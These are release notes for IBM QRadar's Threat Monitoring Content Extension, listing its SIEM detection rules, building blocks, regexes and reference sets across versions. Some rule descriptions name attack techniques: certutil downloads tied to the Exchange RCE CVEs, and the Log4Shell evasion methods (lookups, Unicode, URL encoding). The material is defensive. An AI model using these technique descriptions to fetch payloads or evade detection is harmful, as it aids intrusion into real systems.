Threat Monitoring
IBM Security QRadar Threat Monitoring Content Extension adds rule content and building blocks to QRadar that focus on threat events and detection. This extension enhances the base rule set of QRadar for administrators who have new QRadar installations.
This content extension requires the QRadar Threat Intelligence app (https://exchange.xforce.ibmcloud.com/hub/extension/IBMQRadar:ThreatIntelligence).
This content extension includes one or more Pulse dashboards. For more information about Pulse dashboards, see QRadar Pulse app.
IBM Security QRadar Threat Monitoring Content Extension
- IBM Security QRadar Threat Monitoring Content Extension 2.6.0
- IBM Security QRadar Threat Monitoring Content Extension 2.5.6
- IBM Security QRadar Threat Monitoring Content Extension 2.5.5
- IBM Security QRadar Threat Monitoring Content Extension 2.5.0
- IBM Security QRadar Threat Monitoring Content Extension 2.4.1
- IBM Security QRadar Threat Monitoring Content Extension 2.4.0
- IBM Security QRadar Threat Monitoring Content Extension 2.3.1
- IBM Security QRadar Threat Monitoring Content Extension 2.3.0
- IBM Security QRadar Threat Monitoring Content Extension 2.2.1
- IBM Security QRadar Threat Monitoring Content Extension 2.2.0
- IBM Security QRadar Threat Monitoring Content Extension 2.1.1
- IBM Security QRadar Threat Monitoring Content Extension 2.1.0
- IBM Security QRadar Threat Monitoring Content Extension 2.0.0
- IBM Security QRadar Threat Monitoring Content Extension 1.2.1
- IBM Security QRadar Threat Monitoring Content Extension 1.2.0
- IBM Security QRadar Threat Monitoring Content Extension 1.1.0
- IBM Security QRadar Threat Monitoring Content Extension 1.0.3
- IBM Security QRadar Threat Monitoring Content Extension 1.0.2
- IBM Security QRadar Threat Monitoring Content Extension 1.0.1
- IBM Security QRadar Threat Monitoring Content Extension 1.0.0
IBM Security QRadar Threat Monitoring Content Extension 2.6.0
The following table shows the rules that are updated in IBM Security QRadar Threat Monitoring Content Extension 2.60.
Type | Name | Description |
---|---|---|
Rule | New High Priority Target Detected | Triggers when a new high priority target is detected. |
Updated New High Risk Targets and High Risk Targets-Pie widgets in the attack surface management pulse dashboard.
IBM Security QRadar Threat Monitoring Content Extension 2.5.6
The following table shows the rules that are new in IBM Security QRadar Threat Monitoring Content Extension 2.5.6.
Type | Name | Description |
---|---|---|
Building Block | BB:DeviceDefinition: Web Servers | Defines events which are detected by the Local system and when the event(s) were detected by Apache HTTP Server, Microsoft IIS, NGINX HTTP Server, or Amazon AWS Route 53. |
Rule | Website Manipulations via SQL Injection | Triggers when abnormal behaviors such as SQL Injection is observed. Forces the detected event to create a new offense and select the offense by source IP address. |
Rule | Microsoft Windows RCE Vulnerability - Suspicious Download Using Certutil | This rule detects Remote Code Execution vulnerabilities in Microsoft Exchange. Microsoft issued "CVE-2022-41040" and "CVE-2022-41082" Exchange Server. Force the detected event to create a new offense and select the offense by source IP address. |
IBM Security QRadar Threat Monitoring Content Extension 2.5.5
The following table shows the rules that are new in IBM Security QRadar Threat Monitoring Content Extension 2.5.5.
Type | Name | Description |
---|---|---|
Rule | Microsoft Windows RCE Vulnerability - File Modification | Detects Remote Code Execution vulnerabilities in Microsoft Exchange. Microsoft issued "CVE-2022-41040" and "CVE-2022-41082". |
Rule | Microsoft Windows RCE Vulnerability - Suspicious Download Using Certutil | Detects Remote Code Execution vulnerabilities in Microsoft Exchange. Microsoft issued "CVE-2022-41040" and "CVE-2022-41082". |
Rule | Microsoft Windows RCE Vulnerability - Suspicious Files | Detects Remote Code Execution vulnerabilities in Microsoft Exchange. Microsoft issued "CVE-2022-41040" and "CVE-2022-41082". |
Rule | Microsoft Windows RCE Vulnerability - Suspicious Hashes | Detects known Windows RCE SHA256 hashes. |
Rule | Microsoft Windows RCE Vulnerability - Suspicious Ips | Detects known Windows RCE IPs. Note: Tune the rule based on log sources to reduce number of
events matching against this rule.
|
The following table shows the custom properties that are new in IBM Security QRadar Threat Monitoring Content Extension 2.5.5.
Name | Optimized | Description |
---|---|---|
File Directory | Yes | Default custom extraction of File Directory from DSM payload. |
Filename | Yes | Default custom extraction of Filename from DSM payload. |
Process Commandline | Yes | Default custom extraction of Process Commandline from DSM payload. |
UrlHost | Yes | Default custom extraction of UrlHost from DSM payload. |
The following table shows the reference sets that are new in IBM Security QRadar Threat Monitoring Content Extension 2.5.5.
Name |
---|
Windows RCE IPs |
Windows RCE SHA256 Hashes |
IBM Security QRadar Threat Monitoring Content Extension 2.5.0
The following table shows the rules that are new in IBM Security QRadar Threat Monitoring Content Extension 2.5.0.
Type | Name | Description |
---|---|---|
Building Block | BB:DeviceDefinition: Attack Surface Management | Defines all attack surface management devices on the system. |
Rule | New Critical Temptation Target Detected | Triggers when a new critical temptation target is detected. |
Rule | New High Priority Target Detected | Triggers when a new high priority target is detected. |
Rule | New High Temptation Target Detected | Triggers when a new high temptation target is detected. |
Rule | Critical Temptation Target Changed to Lower Temptation | Triggers when a critical temptation target has decreased to medium or low temptation. |
Rule | High Priority Target Changed to Low Priority | Triggers when a high priority target decreased in priority value. |
Rule | High Temptation Target Changed to Lower Temptation | Triggers when a high temptation target has decreased to medium or low temptation. |
The following table shows the custom properties that are new in IBM Security QRadar Threat Monitoring Content Extension 2.5.0.
Name | Description |
---|---|
Priority | Default custom extraction of Priority from DSM payload. |
Target ID | Default custom extraction of Target ID from DSM payload. |
Temptation | Default custom extraction of Temptation from DSM payload. |
The following table shows the reference sets that are new in IBM Security QRadar Threat Monitoring Content Extension 2.5.0.
Name | Description |
---|---|
Critical Temptation Target | Maintains list of critical temptation targets. |
High Priority Target | Maintains list of high priority targets. |
High Temptation Target | Maintains list of high temptation targets. |
A new Pulse Dashboard is added, Attack Surface Management Devices Overview.
IBM Security QRadar Threat Monitoring Content Extension 2.4.1
- Multiple Threats Detected on Same Host (by Machine Identifier)
- Same Threat Detected on Same Host (by Machine Identifier)
- Same Threat Detected on Same Network Different Hosts (by Machine Identifier)
- Same Threat Detected on Multiple Hosts (by Machine Identifier)
- Same Threat Detected on Multiple Servers (by Machine Identifier)
- Multiple Unclean Threats Detected on Same Host (by Machine Identifier)
IBM Security QRadar Threat Monitoring Content Extension 2.4.0
The following table shows the rules that are updated in IBM Security QRadar Threat Monitoring Content Extension 2.4.0.
Type | Name | Update |
---|---|---|
Rule | Multiple Unclean Threats Detected on Same Host | Rule condition updated. |
Rule | Multiple Vector Attack Source | Rule updated to use BB:CategoryDefinition: Virus Detected instead of BB:CategoryDefinition: Malware Annoyances. |
Rule | Potential HTTP DoS Flooding | Rule condition updated. |
Rule | SMB Traffic Permitted From a Compromised Host | Fixed incorrect reference set link. |
Rule | Successful Login From a Compromised Host | Fixed incorrect reference set link. |
Rule | Suspicious Web Server Activities | Rule condition updated. |
- BB:CategoryDefinition: Malware Annoyances
- BB:Policy Violation: Application Policy Violation: NNTP to Internet
- BB:Policy Violation: IRC IM Policy Violation: IM Communications
- BB:Policy Violation: Mail Policy Violation: Outbound Mail Sender
IBM Security QRadar Threat Monitoring Content Extension 2.3.1
IBM Security QRadar Threat Monitoring Content Extension 2.3.1 includes a fix for an issue that caused installation to fail on QRadar 7.4.1 and earlier.
IBM Security QRadar Threat Monitoring Content Extension 2.3.0
The following table shows the building blocks that are new in IBM Security QRadar Threat Monitoring Content Extension 2.3.0.
Type | Name | Description |
---|---|---|
Building Block | BB:BehaviorDefinition: Communication with a Potential Hostile Host (Flows Reference Sets) |
Defines communication with a potential hostile host, categorized by reference sets. The reference sets starting with "XFE ATPF" prefixes are automatically managed by the Threat Intelligence app and required a paid subscription. The other reference sets provided by the Threat Intelligence app can be used to included third party Threat Intelligence feeds. |
Building Block | BB:BehaviorDefinition: Communication with a Potential Hostile Host (Flows X-Force Categorization) |
Defines communication with a potential hostile host, categorized by X-Force. The confidence factor ranges between 0-100. |
Building Block | BB:BehaviorDefinition: Communication with a Potential Hostile IP Address (Flows Reference Sets) |
Defines communication with a potential hostile IP address, categorized by reference sets. The reference sets starting with "XFE ATPF" prefixes are automatically managed by the Threat Intelligence app and required a paid subscription. The other reference sets provided by the Threat Intelligence app can be used to included third party Threat Intelligence feeds. |
Building Block | BB:BehaviorDefinition: Communication with a Potential Hostile IP Address (Flows X-Force Categorization) | Defines communication with a potential hostile IP address, categorized by X-Force. |
The following list shows the rules and building blocks that are updated in IBM Security QRadar Threat Monitoring Content Extension 2.3.0.
- BB:Threats: Suspicious Network Traffic
- BB:Threats: Suspicious IP Network Traffic
- BB:Threats: X-Force Premium: Internal Connection to Host Categorized as Cryptocurrency Mining
- Communication with a Potential Hostile Host (Flows)
- Communication with a Potential Hostile IP Address (Flows)
- X-Force: Internal Connection to Host Categorized as Malware
- X-Force: Internal Host Communicating with Host Categorized as Anonymizer
- X-Force: Mail Server Sending Mail to Server Categorized as SPAM
- X-Force: Non-Mail Server Sending Mail to Servers Categorized as SPAM
- X-Force: Non-Servers Communicating with External IP Classified as Dynamic
- X-Force: Servers Communicating with External IP Classified as Dynamic
- X-Force: Successful Inbound connection from a Remote Proxy or Anonymization Service
- X-Force: Successful Outbound Connection to a Remote Proxy or Anonymization Service
The following list shows the rules and building blocks that are updated in IBM Security QRadar Threat Monitoring Content Extension 2.3.0.
Type | Name | Update Details |
---|---|---|
Building Block | DeviceDefinition: DNS | Added additional log sources. |
Building Block | DeviceDefinition: Web Servers | Added additional log sources. |
Rule | Log4Shell Base Pattern in Flows | Removed BB:CategoryDefinition Successful Communication |
Rule | Log4Shell Evasion Pattern in Flows | Removed BB:CategoryDefinition Successful Communication |
IBM Security QRadar Threat Monitoring Content Extension 2.2.1
The following table shows the rules that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.2.1.
Type | Name | Description |
---|---|---|
Rule | Multiple Threats Detected on Same Host | Triggers when multiple threats are detected on the same host. |
Rule | Same Threat Detected on Multiple Hosts | Triggers when the same threat is detected on multiple hosts that are not servers, which may indicate the presence of malware that is spreading in a network. |
Rule | Same Threat Detected on Multiple Servers | Triggers when the same threat is detected on multiple hosts that are servers, which may indicate the presence of malware that is spreading in a network. |
Rule | Same Threat Detected on Same Host | Triggers when the same threat is detected multiple times on the same host. This rule may indicate that the AV is cleaning a file that is generated by the threat and not the threat itself. The time window should be large enough to cover at least two cycles of checks made by the AV. |
Rule | Same Threat Detected on Same Network Different Hosts | Triggers when the same threat is detected on different hosts in the same segment of a network hierarchy, which may indicate the presence of malware that is spreading in the network. |
Rule | X-Force: Successful Outbound Connection to a Remote Proxy or Anonymization Service | Triggers when communication with a remote proxy or an anonymization service is observed. These services typically hide in the originating address of the Source IP. |
IBM Security QRadar Threat Monitoring Content Extension 2.2.0
The following table shows the custom properties that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.2.0.
Name | Optimized | Found in |
---|---|---|
File Hash | Yes | |
HTTP Content-Type | Yes | Baseline Maintenance |
HTTP GET Request | Yes | Baseline Maintenance |
HTTP Host | Yes | Baseline Maintenance |
HTTP Referer | Yes | Baseline Maintenance |
HTTP Server | Yes | Baseline Maintenance |
HTTP User-Agent | Yes | Baseline Maintenance |
The following table shows the custom functions that are new in IBM Security QRadar Threat Monitoring Content Extension 2.2.0.
Name | Description |
---|---|
Log4j Detected | Detects log4j obfuscation techniques. |
The following table shows the rules that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.2.0.
Type | Name | Description |
---|---|---|
Building Block | BB:CategoryDefinition: Database Access Denied | Identifies database events that are considered denied access. |
Building Block | BB:CategoryDefinition: Malware Annoyances | Defines spyware infection events. |
Building Block | BB:CategoryDefinition: Virus Detected | Defines virus detection events. |
Building Block | BB:FalseNegative: Events That Indicate Successful Compromise | Defines successful compromise events. |
Building Block | BB:NetworkDefinition: Undefined IP Space | Defines areas of your network that does not contain any valid hosts. |
Building Block | BB:NetworkDefinition: Watch List Addresses | Defines networks to be included into a watch list. |
Rule | Exploit Followed by Suspicious Host Activity | Triggers when exploit or attack events are followed by suspicious activity event, which may indicate a successful attack. |
Rule | Exploit: Exploits Followed by Firewall Accepts | Triggers when exploit or attack events are followed by firewall accept events, which may indicate a successful attack. |
Rule | Exploit/Malware Events Across Multiple Destinations | Triggers when exploit or malware events are seen on multiple destination hosts. This could indicate a malicious software or an attacker exploiting vulnerable hosts on the network. |
Rule | Log4Shell Base Pattern in Flows | Triggers when potential Remote Code Execution related to Log4Shell Exploit (CVE-2021-44228) is observed. This could indicate an attacker bypassing it via techniques such as system environment variables, lower or upper lookup, invalid Unicode characters with upper, system properties, HTML URL encoding and notations. |
Rule | Log4Shell Evasion Pattern in Flows | Triggers when potential Remote Code Execution related to Log4Shell Exploit (CVE-2021-44228) is observed. This could indicate an attacker bypassing it via techniques such as system environment variables, lower or upper lookup, invalid Unicode characters with upper, system properties, HTML URL encoding and notations. |
Rule | Log4Shell Hash in Events | Added File Hash to the rule condition |
Rule | Multiple Unclean Threats Detected on Same Host | Triggers when multiple threats have been detected on the same host where the antivirus action
taken is neither clean or quarantine. Note: This rule should be tuned to reflect the acceptable
antivirus actions.
|
Rule | Multiple Vector Attack Source | Triggers when a source host tries multiple attack vectors. This could indicate the source host is specifically targeting an asset. |
Rule | Potential DoS Attack via Web Server Response Time | Updated rule to match the QID. |
Rule | Potential Log4Shell Activity | Triggers when potential Remote Code Execution related to Log4Shell Exploit (CVE-2021-44228) is observed. This could indicate an attacker bypassing it via techniques such as system environment variables, lower or upper lookup, invalid Unicode characters with upper, system properties, HTML URL encoding and notations. |
Rule | Potential Log4Shell Activity (Flows) | Triggers when potential Remote Code Execution related to Log4Shell Exploit (CVE-2021-44228) is observed. This could indicate an attacker bypassing it via techniques such as system environment variables, lower or upper lookup, invalid Unicode characters with upper, system properties, HTML URL encoding and notations. |
Rule | Source Vulnerable to any Exploit | Triggers when a local host is attacked where the source has at least one vulnerability. This could indicate the host was targeted in a previous exploit. |
Rule | Source Vulnerable to this Exploit | Triggers when a local host is attacked where the source host is vulnerable to the attack being used. This could indicate the host was targeted in a previous exploit or vulnerability. |
Rule | Successful Signature Compromise | Triggers when a host signature is successfully compromised. |
Rule | Website Manipulation via SQL Injection | Updated the AQL filter. |
- BB:CategoryDefinition: Any Flow
- BB:CategoryDefinition: Authentication Success
- BB:CategoryDefinition: Exploits Backdoors and Trojans
- BB:CategoryDefinition: Firewall or ACL Accept
- BB:CategoryDefinition: Firewall or ACL Denies
- BB:CategoryDefinition: IRC Detected Based on Application
- BB:CategoryDefinition: IRC Detected Based on Event Category
- BB:CategoryDefinition: IRC Detection Based on Firewall Events
- BB:CategoryDefinition: Mail Policy Violation
- BB:CategoryDefinition: Post Exploit Account Activity
- BB:CategoryDefinition: Recon Event Categories
- BB:CategoryDefinition: Recon Events
- BB:CategoryDefinition: Recon Flows
- BB:CategoryDefinition: Successful Communication
- BB:CategoryDefinition: Suspicious Event Categories
- BB:CategoryDefinition: Suspicious Events
- BB:CategoryDefinition: Suspicious Flows
- BB:CategoryDefinition: Unidirectional Flow
- BB:CategoryDefinition: Unidirectional Flow DST
- BB:CategoryDefinition: Unidirectional Flow SRC
- BB:DeviceDefinition: AV/AM
- BB:DeviceDefinition: FW / Router / Switch
- BB:DeviceDefinition: IDS / IPS
- BB:DeviceDefinition: Proxy
- BB:Flowshape: Inbound Only
- BB:Flowshape: Outbound Only
- BB:HostDefinition: Database Servers
- BB:HostDefinition: DHCP Servers
- BB:HostDefinition: DNS Servers
- BB:HostDefinition: FTP Servers
- BB:HostDefinition: LDAP Servers
- BB:HostDefinition: Mail Servers
- BB:HostDefinition: Network Management Servers
- BB:HostDefinition: Proxy Servers
- BB:HostDefinition: RPC Servers
- BB:HostDefinition: Servers
- BB:HostDefinition: SNMP Sender or Receiver
- BB:HostDefinition: SSH Servers
- BB:HostDefinition: Virus Definition and Other Update Servers
- BB:HostDefinition: Web Servers
- BB:HostDefinition: Windows Servers
- BB:HostReference: Database Servers
- BB:HostReference: DHCP Servers
- BB:HostReference: DNS Servers
- BB:HostReference: FTP Servers
- BB:HostReference: LDAP Servers
- BB:HostReference: Mail Servers
- BB:HostReference: Proxy Servers
- BB:HostReference: SSH Servers
- BB:HostReference: Web Servers
- BB:HostReference: Windows Servers
- BB:NetworkDefinition: Honeypot like Addresses
- BB:PortDefinition: Common Worm Ports
- BB:PortDefinition: Database Ports
- BB:PortDefinition: DHCP Ports
- BB:PortDefinition: DNS Ports
- BB:PortDefinition: FTP Ports
- BB:PortDefinition: IRC Ports
- BB:PortDefinition: LDAP Ports
- BB:PortDefinition: Mail Ports
- BB:PortDefinition: Proxy Ports
- BB:PortDefinition: RPC Ports
- BB:PortDefinition: SNMP Ports
- BB:PortDefinition: SSH Ports
- BB:PortDefinition: Web Ports
- BB:PortDefinition: Windows Ports
- BB:ProtocolDefinition: Windows Protocols
- Local: FTP Detected on Non-Standard Port
- Local: SSH or Telnet Detected on Non-Standard Port
- Possible Local IRC Server
- Potential Honeypot Access
- Remote: FTP Detected on Non-Standard Port
- Remote: Local P2P Client Connected to more than 100 Servers
- Remote: Local P2P Client Detected
- Remote: Local P2P Server Detected
- Remote: SMTP Mail Sender
- Remote: SSH or Telnet Detected on Non-Standard Port
- Remote: Suspicious Amount of IM/Chat Traffic
- Remote: Usenet Usage
The following table shows the saved searches that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.2.0.
Name | Description |
---|---|
Potential Log4Shell Detected | Searches to detect Log4j activity in events. |
Potential Log4Shell Detected (Flows) | Searches to detect Log4j activity in flows. |
IBM Security QRadar Threat Monitoring Content Extension 2.1.1
Updated the error handling in the HOMOGLYPH::DETECTED custom function that is used in several rules and saved searches.
The following table shows the reference data that is new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.1.1.
Name | Description |
---|---|
Malicious URLs | Lists identified malicious URLs. |
Malware URLs | Lists identified malware URLs. |
Phishing URLs | Lists identified phishing URLs. |
IBM Security QRadar Threat Monitoring Content Extension 2.1.0
The following table shows the custom properties that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.1.0.
Name | Optimized | Found in |
---|---|---|
API Path | No | Amazon AWS |
MD5 Hash | No | Cisco AMP |
Parent MD5 Hash | No | Cisco AMP |
Parent SHA1 Hash | No | Cisco AMP |
Parent SHA256 Hash | No | Cisco AMP |
Referrer URL | Yes | |
Request URI | No | Amazon AWS |
SHA1 Hash | No | Cisco AMP |
SHA256 Hash | No | Cisco AMP |
URL | Yes | |
URL Path | No | Cisco AMP |
UrlHost | Yes | |
User Agent | No |
The following table shows the rules that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.1.0.
Type | Name | Description |
---|---|---|
Rule | Log4Shell Base Pattern | Triggers when potential Remote Code Execution related to Log4Shell Exploit (CVE-2021-44228) is observed. This could indicate an attacker bypassing it via techniques such as system environment variables, lower or upper lookup, invalid Unicode characters with upper, system properties, HTML URL encoding and notations. |
Rule | Log4Shell Evasion Pattern | Triggers when potential Remote Code Execution related to Log4Shell Exploit (CVE-2021-44228) is observed. This could indicate an attacker bypassing it via techniques such as system environment variables, lower or upper lookup, invalid Unicode characters with upper, system properties, HTML URL encoding and notations. |
Rule | Log4Shell Hash in Events |
Triggers when an IOC (File Hash) related to Log4Shell Exploit (CVE-2021-44228) is observed in an event. Note: The Log4Shell MD5, Log4Shell SHA1, and
Log4Shell SHA256 reference sets have been prepopulated. Tune these reference
sets with relevant IOC.
|
Rule | Log4Shell Hash in Flows | Triggers when an IOC (File Hash) related to Log4Shell Exploit (CVE-2021-44228) is observed in
a flow. Note: The Log4Shell MD5, Log4Shell SHA1, and
Log4Shell SHA256 reference sets have been prepopulated. Tune these reference
sets with relevant IOC.
|
The following table shows the reference data that is new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.1.0.
Name | Description |
---|---|
Log4Shell MD5 | This reference set lists MD5 hashes associated with Log4Shell (CVE-2021-44228). |
Log4Shell SHA1 | This reference set lists SHA1 hashes associated with Log4Shell (CVE-2021-44228). |
Log4Shell SHA256 | This reference set lists SHA256 hashes associated with Log4Shell (CVE-2021-44228). |
The following table shows the saved searches that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.1.0.
Name | Description |
---|---|
Historical Instances of Log4Shell - Events | Searches to detect Log4j activity in events. |
Historical Instances of Log4Shell - Flows | Searches to detect Log4j activity in flows. |
Log4Shell Base Pattern | Searches to detect Log4j activity. |
Log4Shell Evasion Pattern | Searches to detect Log4j activity. |
IBM Security QRadar Threat Monitoring Content Extension 2.0.0
The following table shows the custom properties that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.0.0.
Name | Optimized | Found in |
---|---|---|
BytesReceived | Yes | |
BytesSent | Yes | |
Method | No | |
Referrer URL | Yes | |
Response Code | No | |
Server Response Time | Yes | Apache |
URL Query String | No |
The following table shows the rules and building blocks that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.0.0.
Type | Name | Description |
---|---|---|
Building Block | BB:DeviceDefinition: Web Servers | Defines DNS devices on the system. |
Building Block | BB:Threats: HTTP Client Status | Detects malformed web server client requests. |
Building Block | BB:Threats: HTTP Server Status | Detects malformed web server requests. |
Building Block | BB:Threats: HTTP Service Unavailable | Detects when the web server service is unavailable. |
Building Block | BB:Threats: Potential DoS Attack | Detects potential Denial-of-Service attacks on a web server. |
Building Block | BB:Threats: Suspicious IP Network Traffic | Detects suspicious network traffic on a web server from an IP address categorized by X-Force as malicious. |
Building Block | BB:Threats: Suspicious Network Traffic | Detects suspicious network traffic on a web server from an IP address categorized by X-Force as malicious. |
Building Block | BB:Threats: Unsafe HTTP Methods | Detects when the web server unsafe http methods. |
Rule | Communication with a web site known to be delivering code which may be a trojan | Updated the rule response. |
Rule | Potential Continued Risky Web Server Activity | Triggers when unsafe HTTP methods are seen continuously. This could be a malicious attacker updating web application contents. |
Rule | Potential DoS Attack on a Web Server | Triggers when a potential Denial-of-Service attack is detected from a single source IP address. |
Rule | Potential DoS Attack via Web Server Response Time | Triggers when a server response time increases exponentially as a result of too many traffic from an IP address. This could indicate abusive users, misbehaving bots, and potential denial-of-service attacks. |
Rule | Potential HTTP DoS Flooding | Triggers when a web server is flooded with an HTTP request. This could indicate a malicious attacker initiating a series of HTTP requests to a web server thereby flooding it with more HTTP requests than it can process. |
Rule | Potential Malicious Activity Identified by Referrer URL | Triggers when a referrer url attributed to potentially malicious activity is observed. |
Rule | Potential Website Content Update | Triggers when a change or update is made to a web application. This could be a malicious attacker updating the content of a web page causing defacement. |
Rule | Same Threat Detected on Same Host | Updated to include IP addresses. |
Rule | Suspicious DNS Query Length | Updated the rule condition. |
Rule | Suspicious Network Traffic to Internal Web Server | Triggers when an IP address that matches known hostile IP addresses categorized by X-Force scans the same URL multiple times. |
Rule | Suspicious Web Server Activities | Triggers when either a web server client error or server error is detected. This could indicate suspicious activity. |
Rule | Website Manipulations via SQL Injection | Triggers when abnormal behaviour such as SQL Injection is observed. |
The following table shows the reference data that is new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.0.0.
Type | Name | Description |
---|---|---|
Reference Set | Malware URLs | This reference set lists identified malware URLs. |
Reference Set | XFE ATPF-mw_url | This reference set lists identified malware URLs. |
The following table shows the saved searches that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.0.0.
Name | Description |
---|---|
Response Time By Server | This search shows the average request time by server. |
IBM Security QRadar Threat Monitoring Content Extension 1.2.1
The following table shows the custom properties in IBM Security QRadar Threat Monitoring Content Extension 1.2.1.
Name | Optimized | Capture Group | Regex |
---|---|---|---|
Threat Name | Yes | 1 | emailThreats=([^\s]+) EVC_EV_VIRUS_NAME=([^\s]+) malware_signature=([^\t]+) Spyware\/Grayware: ([^\s]+) threatName=([^\s]+) virus_name: "(.*?)" Virus\/Malware: ([^\s]+) VirusName=([^\t]+) |
IBM Security QRadar Threat Monitoring Content Extension 1.2.0
The following table shows the custom properties in IBM Security QRadar Threat Monitoring Content Extension 1.2.0.
Name | Optimized | Capture Group | Regex |
---|---|---|---|
DNS Request Type | No | 1 1 2 |
cat=([^_]+) Question Type=([^\s]+) query:\s([^\s]+)\s\w+\s(\w+) |
Subtype | No | 1 | Send/Receive indicator=([^\s]+) |
The following table shows the custom properties used in IBM Security QRadar Threat Monitoring Content Extension 1.2.0 that are found in other content extensions.
Custom Property | Optimized | Found In |
---|---|---|
Error Code | Yes | |
Process Name | Yes | |
UrlHost | Yes |
The following table shows the rules and building blocks in IBM Security QRadar Threat Monitoring Content Extension 1.2.0.
Type | Name | Description |
---|---|---|
Building Block | BB:DeviceDefinition: DNS | Defines DNS devices on the system. |
Rule | Communication with a Potential Hostile Host (Flows) | Triggers when flow content includes a host that matches known hostile host categorized by
X-force or in the reference set collection. Note: The Malicious URLs,
Malware URLs, and Phishing URLs reference sets must be
populated. The Threat Intelligence App can be used to import threat intel feeds in these reference
sets.
|
Rule | Communication with a Potential Hostile IP Address (Flows) | Triggers when flow content includes an IP that matches known hostile IP addresses categorized
by X-force or in the reference set collection. Note: The Malware IPs, Botnet IPs, Botnet C&C IPs, Phishing IPs, Anonymizer IPs reference sets must be populated. The Threat Intelligence App can be used to import threat intel feeds in these reference sets. |
Rule | Excessive Denied SMB Traffic from a Compromised Host | Triggers when excessive SMB connections tentative are performed from a host categorized as compromised. |
Rule | Potential Homoglyph Usage | Triggers when a domain name contains a homoglyph character(s), which could make a domain
appear the same as a trusted domain and redirects to a malicious host. The custom function HOMOGLYPH::DETECTED, which is pre-filled with 1792 entries of homoglyph characters, accepts a string and returns true if the string contains a homoglyph character. Note: To view the events that
would trigger this rule, use the Potential Homoglyph Usage search. Tune the
rule with valid characters before enabling the rule and offense creation.
|
Rule | Potential Homoglyph Usage (Flows) | Triggers when a domain name contains a homoglyph character(s), which could make a domain
appear the same as a trusted domain and redirects to a malicious host. The custom function HOMOGLYPH::DETECTED, which is pre-filled with 1792 entries of homoglyph characters, accepts a string and returns true if the string contains a homoglyph character. Note: To view the flows that would
trigger this rule, use the Potential Homoglyph Usage (Flows) search. Tune the
rule with valid characters before enabling the rule and offense creation.
|
Rule | SMB Traffic Permitted from a Compromised Host | Triggers when SMB traffic has been allowed from a host categorized as compromized. |
Rule | Successful Login From a Compromised Host | Triggers when a successful authentication is performed on a host that has been categorized as compromized. |
Rule | Suspicious DNS Query Length | Triggers when a DNS is abnormally long, this could indicate DGA domains & onion domains. |
Rule | Suspicious program initiating DNS Query (Window) | Triggers when a program that is not referenced as legitimate is initiating a DNS
query. Note: The DNS Application Whitelist reference set must be populated
with applications allowed to generate DNS queries
|
The severity, credibility, relevance, and response limiter are updated in IBM Security QRadar Threat Monitoring Content Extension 1.2.0.
The following table shows the rules that are renamed in IBM Security QRadar Threat Monitoring Content Extension 1.2.0.
Old Name | New Name |
---|---|
Local: Hidden FTP Server | Local: FTP Detected on Non-Standard Port |
Remote: IM/Chat | Remote: Suspicious Amount of IM/Chat Traffic |
X-Force Premium: Internal Connection to Host Categorized as Malware | X-Force: Internal Connection to Host Categorized as Malware |
X-Force Premium: Internal Host Communicating with Botnet Command and Control URL | X-Force: Internal Host Communicating with Botnet Command and Control URL |
X-Force Premium: Internal Host Communication with Malware URL | X-Force: Internal Host Communication with Malware URL |
X-Force Premium: Internal Hosts Communicating with Host Categorized as Anonymizers | X-Force: Internal Host Communicating with Host Categorized as Anonymizer |
X-Force Premium: Mail Server Sending Mail to Servers Categorized as SPAM | X-Force: Mail Server Sending Mail to Server Categorized as SPAM |
X-Force Premium: Non-Mail Server Sending Mail to Servers Categorized as SPAM | X-Force: Non-Mail Server Sending Mail to Servers Categorized as SPAM |
X-Force Premium: Non-Servers Communicating with External IP Classified as Dynamic | X-Force: Non-Servers Communicating with External IP Classified as Dynamic |
X-Force Premium: Servers Communicating with External IP Classified as Dynamic | X-Force: Servers Communicating with External IP Classified as Dynamic |
The following rules were updated in IBM Security QRadar Threat Monitoring Content Extension 1.2.0 to use Source Address instead of Source IP:
- Failed Communication to a Malicious Website
- Multiple Threats Detected on Same Host
- Same Threat Detected on Multiple Hosts
- Same Threat Detected on Multiple Servers
- Same Threat Detected on Same Host
- Same Threat Detected on Same Network Different Hosts
The following rules were updated in IBM Security QRadar Threat Monitoring Content Extension 1.2.0 to use Destination Address instead of Destination IP:
- Excessive Denied SMB Traffic From a Compromised Host
- SMB Traffic Permitted From a Compromised Host
- Successful Login From a Compromised Host
The following table shows the reference sets in IBM Security QRadar Threat Monitoring Content Extension 1.2.0.
Type | Name | Description |
---|---|---|
Reference Data | pulse_imports | Part of the Pulse dashboard. |
Reference Set | Anonymizer IPs | This reference set lists identified anonymizer IP addresses. |
Reference Set | Botnet C&C IPs | This reference set lists identified botnet command and control server IP addresses. |
Reference Set | Botnet IPs | This reference set lists identified botnet IP addresses. |
Reference Set | Compromised Hosts | This reference set lists identified compromised hosts. |
Reference Set | DNS Application Allowlist | This reference set lists DNS applications allow list. |
Reference Set | Malicious URLs | This reference set lists identified malicious URLs. |
Reference Set | Malicious Web Categories | This reference set lists identified malicious web categories. |
Reference Set | Malware IPs | This reference set lists identified malware IP addresses. |
Reference Set | Malware URLs | This reference set lists identified malware URLs. |
Reference Set | Phishing IPs | This reference set lists identified phishing IP addresses. |
Reference Set | Phishing URLs | This reference set lists identified phishing URLs. |
The following table shows the saved searches in IBM Security QRadar Threat Monitoring Content Extension 1.2.0.
Name | Description |
---|---|
Potential Homoglyph Usage | Detects usage of homoglyph characters. |
Potential Homoglyph Usage (Flows) | Detects usage of homoglyph characters in flows. |
IBM Security QRadar Threat Monitoring Content Extension 1.1.0
The following table shows the custom properties that are included in IBM Security QRadar Threat Monitoring Content Extension 1.1.0.
Custom Property | Found in |
---|---|
Threat Name | |
URL | |
Web Category |
The following table shows the rules and building blocks that are updated in IBM Security QRadar Threat Monitoring Content Extension 1.1.0.
Type | Name | Description |
---|---|---|
Building Block | BB:Threats: Suspicious IP Protocol Usage: Illegal TCP Flag Combination | Identifies flows that have an illegal TCP flag combination. |
